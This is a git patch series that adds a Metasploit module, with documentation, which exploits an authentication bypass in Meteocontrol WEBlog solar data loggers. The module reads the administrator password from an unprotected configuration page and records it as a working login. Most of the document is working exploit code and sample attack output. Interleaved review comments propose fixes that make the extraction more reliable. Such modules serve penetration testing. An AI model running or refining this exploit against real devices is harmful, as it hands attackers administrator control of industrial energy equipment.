From 39423a70a7d9e90c2e42a9f6a82d263928b68965 Mon Sep 17 00:00:00 2001
From: juushya
Date: Fri, 6 Jan 2017 15:20:41 +0530
Subject: [PATCH 1/6] Add Meteocontrol Weblog Extract Admin password module
---
 .../http/meteocontrol_weblog_extractadmin.rb | 133 ++++++++++++++++++
 1 file changed, 133 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
new file mode 100644
index 0000000000..aeefa7a895
--- /dev/null
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Meteocontrol WEBlog Password Extractor',
+ 'Description' => %{
+ This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal.
+ },
+ 'References' =>
+ [
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ],
+ [ 'CVE', '2016-2296' ],
+ [ 'CVE', '2016-2298' ]
+ ],
+ 'Author' =>
+ [
+ 'Karn Ganeshen ',
+ ],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly.
+ ], self.class)
+ end
+
+ def run_host(ip)
+ unless is_app_metweblog?
+ return
+ end
+
+ do_extract
+ end
+
+ #
+ # Check if App is Meteocontrol WEBlog
+ #
+
+ def is_app_metweblog?
+ begin
+ res = send_request_cgi(
+ {
+ 'uri' => '/html/en/index.html',
+ 'method' => 'GET'
+ })
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+ print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+ return false
+ end
+
+ if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log")))
+ print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
+ return true
+ else
+ print_error("#{rhost}:#{rport} - Application does not appear to be Meteocontrol WEBlog. 
Module will not continue.")
+ return false
+ end
+ end
+
+ #
+ # Extract Administrator Password
+ #
+
+ def do_extract()
+
+ print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
+ begin
+ res = send_request_cgi(
+ {
+ 'uri' => '/html/en/confAccessProt.html',
+ 'method' => 'GET'
+ })
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+ print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+ return
+ end
+
+ if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/)
+ get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
+ admin_password = get_admin_password[1]
+ print_good("#{rhost}:#{rport} - Password is #{admin_password}")
+ report_cred(
+ ip: rhost,
+ port: rport,
+ service_name: 'Meteocontrol WEBlog Management Portal',
+ password: admin_password,
+ proof: res.body)
+ else
+ # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases.
+ print_error("Password not found. Check login manually.")
+ end
+ end
+
+ def report_cred(opts)
+ service_data = {
+ address: opts[:ip],
+ port: opts[:port],
+ service_name: opts[:service_name],
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ origin_type: :service,
+ module_fullname: fullname,
+ username: opts[:user],
+ private_data: opts[:password],
+ private_type: :password
+ }.merge(service_data)
+
+ login_data = {
+ last_attempted_at: Time.now,
+ core: create_credential(credential_data),
+ status: Metasploit::Model::Login::Status::SUCCESSFUL,
+ proof: opts[:proof]
+ }.merge(service_data)
+
+ create_credential_login(login_data)
+ end
+end
From 93168648b4f9843ccb71dc702ccacde3e945870e Mon Sep 17 00:00:00 2001
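Review bot: The value captured by `value="(.*?)"` in do_extract is printed and stored verbatim, but it is an HTML attribute value, so a password containing `"`, `&` or `<` will arrive entity-encoded (`&quot;`, `&amp;`, `&lt;`) and the reported credential will be wrong; decode it first, e.g. `admin_password = Rex::Text.html_decode(get_admin_password[1])` (assuming that helper exists in the targeted framework version; `CGI.unescapeHTML` with a `require 'cgi'` is the stdlib fallback). Relatedly, report_cred reads `opts[:user]` but the only caller never passes it, so every login is stored with a nil username; if the portal's admin account name is fixed, pass it as `user:` from do_extract, otherwise say in a comment that the username cannot be recovered from this page. report_cred itself has no header comment; one line such as `# Record the recovered password as a SUCCESSFUL login against this service; opts[:proof] is the raw page body.` would make its contract clear.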
From: juushya
Date: Sun, 8 Jan 2017 13:28:07 +0530
Subject: [PATCH 2/6] Minor update in description
---
 .../auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
index aeefa7a895..4e8a42aa61 100644
--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
 super(update_info(info,
 'Name' => 'Meteocontrol WEBlog Password Extractor',
 'Description' => %{
- This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal.
+ This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal.
 },
 'References' =>
 [
From dc33d417e029e8970342eb257343397164a9745f Mon Sep 17 00:00:00 2001
From: juushya
Date: Sun, 8 Jan 2017 13:44:38 +0530
Subject: [PATCH 3/6] Add Meteocontrol Weblog Doc - PR #7790
---
 .../http/meteocontrol_weblog_extractadmin.md | 54 +++++++++++++++++++
 1 file changed, 54 insertions(+)
 create mode 100644 documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
new file mode 100644
index 0000000000..68d227a58d
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
@@ -0,0 +1,54 @@
+Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
+
+Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
+
+## Verification Steps
+
+1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+ ```
+msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
+msf auxiliary(meteocontrol_weblog_extractadmin) > info
+
+ Name: MeteoControl WEBLog Password Extractor
+ Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin
+ License: Metasploit Framework License (BSD)
+ Rank: Normal
+
+Provided by:
+ Karn Ganeshen
+
+Basic options:
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target address range or CIDR identifier
+ RPORT 8080 yes The target port
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ THREADS 1 yes The number of concurrent threads
+ VHOST no HTTP server virtual host
+
+Description:
+ This module exploits an authentication bypass vulnerability in
+ Meteocontrol WEBLog (all models) to extract Administrator password
+ for the device management portal.
+
+References:
+ https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
+ http://cvedetails.com/cve/2016-2296/
+ http://cvedetails.com/cve/2016-2298/
+
+msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4
+msf auxiliary(meteocontrol_weblog_extractadmin) > run
+
+[+] 1.2.3.4:8080 - Running Meteocontrol WEBlog management portal...
+[*] 1.2.3.4:8080 - Attempting to extract Administrator password...
+[+] 1.2.3.4:8080 - Password is password
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+ ```
From 657c7444bf279a4ff0852e4d257a1d940a001963 Mon Sep 17 00:00:00 2001
From: juushya
Date: Tue, 17 Jan 2017 00:17:57 +0530
Subject: [PATCH 4/6] rubocop check & msftidy clean. Few updates.
---
 .../http/meteocontrol_weblog_extractadmin.md | 32 +-----------
 .../http/meteocontrol_weblog_extractadmin.rb | 52 +++++++++----------
 2 files changed, 27 insertions(+), 57 deletions(-)
diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
index 68d227a58d..a1eba6a6c9 100644
--- a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
+++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
@@ -4,7 +4,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
 ## Verification Steps
-1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
+1. Do: ```use auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```
@@ -13,36 +13,6 @@ Note: In some versions, 'Website password' page is renamed or not present. There
 ```
 msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
-msf auxiliary(meteocontrol_weblog_extractadmin) > info
-
- Name: MeteoControl WEBLog Password Extractor
- Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin
- License: Metasploit Framework License (BSD)
- Rank: Normal
-
-Provided by:
- Karn Ganeshen
-
-Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RHOSTS yes The target address range or CIDR identifier
- RPORT 8080 yes The target port
- SSL false no Negotiate SSL/TLS for outgoing connections
- THREADS 1 yes The number of concurrent threads
- VHOST no HTTP server virtual host
-
-Description:
- This module exploits an authentication bypass vulnerability in
- Meteocontrol WEBLog (all models) to extract Administrator password
- for the device management portal.
-
-References:
- https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
- http://cvedetails.com/cve/2016-2296/
- http://cvedetails.com/cve/2016-2298/
-
 msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4
 msf auxiliary(meteocontrol_weblog_extractadmin) > run
diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
index 4e8a42aa61..2887c85bb7 100644
--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -15,25 +15,25 @@ class MetasploitModule < Msf::Auxiliary
 super(update_info(info,
 'Name' => 'Meteocontrol WEBlog Password Extractor',
 'Description' => %{
- This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal.
+ This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.
 },
 'References' =>
 [
- [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ],
- [ 'CVE', '2016-2296' ],
- [ 'CVE', '2016-2298' ]
+ ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'],
+ ['CVE', '2016-2296'],
+ ['CVE', '2016-2298']
 ],
 'Author' =>
 [
- 'Karn Ganeshen ',
+ 'Karn Ganeshen '
 ],
- 'License' => MSF_LICENSE
- ))
+ 'License' => MSF_LICENSE))
 register_options(
- [
- Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly.
- ], self.class)
+ [
+ Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly.
+ ], self.class
+ )
 end
 def run_host(ip)
@@ -50,17 +50,17 @@ class MetasploitModule < Msf::Auxiliary
 def is_app_metweblog?
 begin
- res = send_request_cgi(
- {
- 'uri' => '/html/en/index.html',
- 'method' => 'GET'
+ res = send_request_cgi({
+ 'uri' => '/html/en/index.html',
+ 'method' => 'GET'
 })
+
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
 print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
 return false
 end
- if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log")))
+ if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server") || res.body.include?("WEB'log")))
 print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
 return true
 else
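Review bot: The rewritten fingerprint condition in is_app_metweblog? relies on `&&` binding tighter than `||` in `res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server") || res.body.include?("WEB'log")`; given the commit's stated goal of rubocop cleanliness, make the grouping explicit, `(res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server")) || res.body.include?("WEB'log")`. The unchanged rescue line just above it handles `::Rex::ConnectionError` and friends but not `::Errno::EPIPE`, which the sibling do_extract rescue does list; aligning the two lists would keep a broken pipe during the fingerprint request from escaping as an unhandled exception. The method's else branch continues past the end of the hunk.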
@@ -77,27 +77,27 @@ class MetasploitModule < Msf::Auxiliary
 print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
 begin
- res = send_request_cgi(
- {
- 'uri' => '/html/en/confAccessProt.html',
- 'method' => 'GET'
+ res = send_request_cgi({
+ 'uri' => '/html/en/confAccessProt.html',
+ 'method' => 'GET'
 })
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
 print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
 return
 end
- if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/)
+ if (res && res.code == 200 && (res.body.include?("szWebAdminPassword") || res.body=~ /Admin Monitoring/))
 get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
 admin_password = get_admin_password[1]
 print_good("#{rhost}:#{rport} - Password is #{admin_password}")
 report_cred(
- ip: rhost,
- port: rport,
- service_name: 'Meteocontrol WEBlog Management Portal',
- password: admin_password,
- proof: res.body)
+ ip: rhost,
+ port: rport,
+ service_name: 'Meteocontrol WEBlog Management Portal',
+ password: admin_password,
+ proof: res.body
+ )
 else
 # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases.
 print_error("Password not found. Check login manually.")
From 36416c20cb574a8d5b6e23f5faf2e1344e52b775 Mon Sep 17 00:00:00 2001
From: juushya
Date: Sat, 4 Feb 2017 03:00:31 +0530
Subject: [PATCH 5/6] Updated check for extract fail case now + Minor edits
---
 .../http/meteocontrol_weblog_extractadmin.rb | 47 ++++++++++---------
 1 file changed, 25 insertions(+), 22 deletions(-)
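Review bot: `res.body=~ /Admin Monitoring/` in the new if condition still has no space around `=~`, which Layout/SpaceAroundOperators would most likely flag despite the commit message saying the file is rubocop clean; write `res.body =~ /Admin Monitoring/`, or, for symmetry with the `include?` beside it and since the captures are unused, `res.body.include?('Admin Monitoring')`. The `rescue` line appears to be removed and re-added with only whitespace differing; that is fine, but a word in the commit message would save readers from hunting for a behavioral change. do_extract's closing `end` lies outside the hunk.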
diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
index 2887c85bb7..619cbf410c 100644
--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -13,21 +13,21 @@ class MetasploitModule < Msf::Auxiliary
 def initialize(info={})
 super(update_info(info,
- 'Name' => 'Meteocontrol WEBlog Password Extractor',
+ 'Name' => 'Meteocontrol WEBlog Password Extractor',
 'Description' => %{
 This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.
 },
- 'References' =>
+ 'References' =>
 [
 ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'],
 ['CVE', '2016-2296'],
 ['CVE', '2016-2298']
 ],
- 'Author' =>
+ 'Author' =>
 [
 'Karn Ganeshen '
 ],
- 'License' => MSF_LICENSE))
+ 'License' => MSF_LICENSE))
 register_options(
 [
@@ -51,8 +51,8 @@ class MetasploitModule < Msf::Auxiliary
 def is_app_metweblog?
 begin
 res = send_request_cgi({
- 'uri' => '/html/en/index.html',
- 'method' => 'GET'
+ 'uri' => '/html/en/index.html',
+ 'method' => 'GET'
 })
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
 return false
 end
- if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server") || res.body.include?("WEB'log")))
+ if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?('IS2 Web Server') || res.body.include?("WEB'log")))
 print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
 return true
 else
@@ -74,12 +74,11 @@ class MetasploitModule < Msf::Auxiliary
 #
 def do_extract()
-
 print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
 begin
 res = send_request_cgi({
- 'uri' => '/html/en/confAccessProt.html',
- 'method' => 'GET'
+ 'uri' => '/html/en/confAccessProt.html',
+ 'method' => 'GET'
 })
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
@@ -87,20 +86,24 @@ class MetasploitModule < Msf::Auxiliary
 return
 end
- if (res && res.code == 200 && (res.body.include?("szWebAdminPassword") || res.body=~ /Admin Monitoring/))
+ if (res && res.code == 200 && (res.body.include?('szWebAdminPassword') || res.body=~ /Admin Monitoring/))
 get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
- admin_password = get_admin_password[1]
- print_good("#{rhost}:#{rport} - Password is #{admin_password}")
- report_cred(
- ip: rhost,
- port: rport,
- service_name: 'Meteocontrol WEBlog Management Portal',
- password: admin_password,
- proof: res.body
- )
+ if get_admin_password[1]
+ admin_password = get_admin_password[1]
+ print_good("#{rhost}:#{rport} - Password is #{admin_password}")
+ report_cred(
+ ip: rhost,
+ port: rport,
+ service_name: 'Meteocontrol WEBlog Management Portal',
+ password: admin_password,
+ proof: res.body
+ )
+ else
+ # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Check login manually on http://IP:port/html/en/confAccessProt.html for the szWebAdminPassword field's value.
+ print_error("Check login manually on http://#{rhost}:#{rport}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.")
+ end
 else
- # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases.
- print_error("Password not found. Check login manually.")
+ print_error("Check login manually on http://#{rhost}:#{rport}/html/en/confAccessProt.html for the 'szWebAdminPassword' field's value.")
 end
 end
From d305f895ffd3514b052efa09480cca93977f74c9 Mon Sep 17 00:00:00 2001
From: juushya
Date: Sat, 4 Feb 2017 11:59:45 +0530
Subject: [PATCH 6/6] Fixed a typo space
---
 .../auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
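Review bot: `if get_admin_password[1]` still dereferences nil: `String#match` returns nil when the `szWebAdminPassword` field is absent, which is exactly the case the `|| res.body=~ /Admin Monitoring/` alternative admits into this branch, so the new manual-check message is never reached and the module dies with NoMethodError instead. Guard the match object itself, `if get_admin_password && get_admin_password[1]`. Both new print_error calls hard-code `http://` in the manual-check URL; when the module is run with SSL set (an option shown in the module's documented option table) the hint points at the wrong scheme, so consider `"#{datastore['SSL'] ? 'https' : 'http'}://#{rhost}:#{rport}/html/en/confAccessProt.html"`. Since the two else branches print the identical string, building it once into a local such as `manual_hint` above the if would remove the duplication.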
diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
index 619cbf410c..41bcf70ae2 100644
--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
 'Description' => %{
 This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.
 },
- 'References' =>
+ 'References' =>
 [
 ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'],
 ['CVE', '2016-2296'],